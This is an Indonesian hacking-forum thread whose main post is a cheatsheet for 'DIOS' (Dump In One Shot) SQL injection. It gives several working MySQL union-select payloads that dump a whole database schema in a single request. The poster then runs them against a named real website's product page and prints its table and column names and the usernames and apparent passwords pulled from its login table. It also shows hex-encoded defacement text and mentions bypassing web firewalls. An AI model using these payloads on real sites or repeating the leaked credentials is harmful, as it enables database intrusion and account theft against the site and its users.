[SHARE] [Manual SQLi] DIOS - DUMP IN ONE SHOOT

M@lc0d3

:jempol2:

tyodjsbmp

ijin...

icalmix89

[youtube][youtube][/youtube][/youtube]

Rozakk

Mohon bimbingannya para suhu

tamamagunzo

:bigcendol:

ngecers

gass

varD

Joss

fahak0007

Ijin bang :D

aryoow

:jempol2:

radenzidho

Newbie ijin nyimak gan

Cynosa

:jempol2:

Taufiq

makasih

okta21

:jempol2:

sec7or leader

:ts:

credo14

izin download gan :D

dwiky10

tetete

Ikramkeren

[quote]versailles wrote:
DIOS (Dump In One Shoot)

Artinya :: kita bisa Dump / mengeluarkan isi database dengan 1 kali request..

singkat sejarah ::
DIOS pertama kali di perkenalkan oleh Profexer (rdot.org) lalu dikembangkan oleh M@dbl00d (Mas fuad-Sec7or team) ,Zen Javanicus (securityidiots.com) ,MakMan ,dan temen2 injector lainnya ..

lets croot :D

/*! PENTING save di tempat yang aman */
-------- DIOS cheatsheet ---------

Query utk Dump Semua Tabel dan Kolom..

======================================
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)

=======================================
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)

=======================================
(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.coLumns )where(@:=concat(@,0x3c6c693e,table_name,0x203a3a20,column_name))),@)))

======================================

(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0x203a3a20,2)),@,2))
---------------------------------------

pilih salah satu Query DIOS..

target :: http://www.icpconcepts.com/produit.php?id=55

Aku anggap kalian sudah bisa menemukan magic number...

Langsung replace column 21 / magic number nya dengan DIOS query :p

kita coba dump semua tabel dan kolom ::

http://www.icpconcepts.com/produit.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),22,23,24,25,26,27,28,29,30--+

-- Result ---

User :: id
User :: code
User :: id_parrain
User :: origine
User :: specialite
User :: nom
User :: prenom
User :: adresse
User :: cp
User :: ville
User :: pays
User :: mail
User :: telephone
User :: login
User :: mdp
User :: type
User :: is_active
User :: l_nom
User :: l_prenom
User :: l_adresse
User :: l_cp
User :: l_ville
User :: l_pays
User :: l_telephone
User :: perle
User :: is_parrain_credite
User :: message
User :: id_commercial
User :: source
User :: source_name
User :: zone_pays
User :: siret
connexion :: id
connexion :: login
connexion :: passwd
connexion :: email
connexion :: nom_connexion
bla bla bla bla .....

kan kita uda tahu nama tabel dan culumn name ,untuk dump / extrak data bgini ::

kita coba dump dari Tabel "connexion" column "id", "login" ,dan "passwd" ..

/*! perhatikan baik2 query yg berubah. */

http://www.icpconcepts.com/produit.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,(select(@x)from(select(@x:=0x00),(select(0)from(connexion)where(@x:=concat+(@x,0x3c62723e,id,0x203a3a20,login,0x203a3a20,passwd))))x),22,23,24,25,26,27,28,29,30--+

--Result--

1 :: Admin2016 :: 3x!/ICQE6a
4 :: lvialeton :: 3x!/ICQE62017
6 :: ISALVT :: 3x!/ICQE6a
9 :: MOLHO :: 3x!/ICQE6a
8 :: VERRIER :: 3x!/ICQE6a
10 :: BILINSKI :: 3x!/ICQE6a
11 :: LESAGER :: 3x!/ICQE6a
15 :: chloe :: 3x!/ICQE6a

#Nb

kalian bisa modif query nya :D
tambahin tag2 html/ sql Command dalam concat()

contoh ::
http://www.icpconcepts.com/produit.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(0x3c666f6e7420636f6c6f723d626c75653e3c623e496e6a6563746564204279205665727361696c6c65733c2f623e3c2f666f6e743e,0x3c62723e4461746162617365203a3a20,database(),0x3c62723e4d7953514c2056657273696f6e203a3a20,version(),0x3c62723e43757272656e742055736572203a3a20,user(),0x3c62723e2053796d6c696e6b203a3a20,@@Global.have_symlink,0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),22,23,24,25,26,27,28,29,30--+

Penjelasan ::
kita bs memasukkan tag2 html pada saat injeksi web..

seperti <font>
dll dengan syarat harus di convert dalam hex .lalu depannya dikasih 0x.

bentuk Hex ::
0x3c666f6e7420636f6c6f723d626c75653e3c623e496e6a6563746564204279205665727361696c6c65733c2f623e3c2f666f6e743e adalah <font color=blue>Injected By Versailles</font>

Dios bisa jg untuk web yg pake firewall .. bs gunakan bypass WAF pada character / strings yg di block sperti biasa..

Dengan memakai tehnik ini kalian tidak perlu convert nama table, dan skaligus kita bisa tahu semua tabel dan kolom secara bersamaan :)

Thanks for ::
rdot.org ,Hackforum.net, securityidiots.com , and all injector forum lainnya..

Sekian dulu ya :3

Versailles
Sec7orTeam[/quote]

Luar biasa

« Previous Page